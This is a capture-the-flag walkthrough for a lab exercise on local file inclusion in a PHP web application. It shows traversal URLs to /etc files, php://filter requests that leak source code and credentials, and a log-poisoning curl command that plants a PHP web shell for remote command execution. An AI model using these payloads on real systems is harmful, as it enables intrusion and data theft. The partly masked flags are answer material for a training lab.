[Day 6] Patch Management Is Hard

{Web Exploitation = LFI}

Challenge

Accessing the webserver returns the following.

Inspecting the URL revealed that the application was invoking the error message from a given file.

Deploy the attached VM and look around. What is the entry point for our web application?

  • err

Replacing the error file with /etc/passwd seemed to return the file and confirm the LFI vulnerability.

http://10.10.109.239/index.php?err=../../../../../etc/flag

Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

  • THM{d29e08941cf7fe41df55f1a7da6c****}

Next, to get the source code of a particular file, I used the PHP filter method as shown below.

http://10.10.109.239/index.php?err=php://filter/convert.base64-encode/resource=index.php

Decoding the base64 value then led me to the next flag.

Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?

  • THM{791d43d46018a0d89361dbf60d5d****}

In the source code, I noticed that there is a file called creds.php and manage.php

manage.php redirects to login.php. This is where the creds.php comes in handy. I used the same filter technique to read the contents of the creds.php file.

http://10.10.103.198/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
<?php 
$USER = "McSkidy";
$PASS = "A0C315Aw3s0m";
?

Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?

  • McSkidy:A0C315Aw3s0m

Logging into the Control System and accessing Password Recovery reveals the next flag.

Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?

  • THM{552f313b52e3c3dbf5257d8c6db7****}

Now that I had access to logs, know where the file is located, and was able to write to the file via web requests, I used the log poisoning method to get remote command execution on the system.

http://10.10.103.198/logs.php

I first poisoned the logs by sending a request with curl and setting a PHP payload as the user agent as shown below. The payload basically allows an attacker to run arbitrary commands remotely, on the server via the browser.

curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.103.198/login.php

Following that, I invoked the logfile via LFI and simply added a cmd argument in the URL and ran commands on the server.

http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=ls
http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=hostname

The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

  • lfi-aoc-awesome-59aedca683fff9261263bb084880c965

Last updated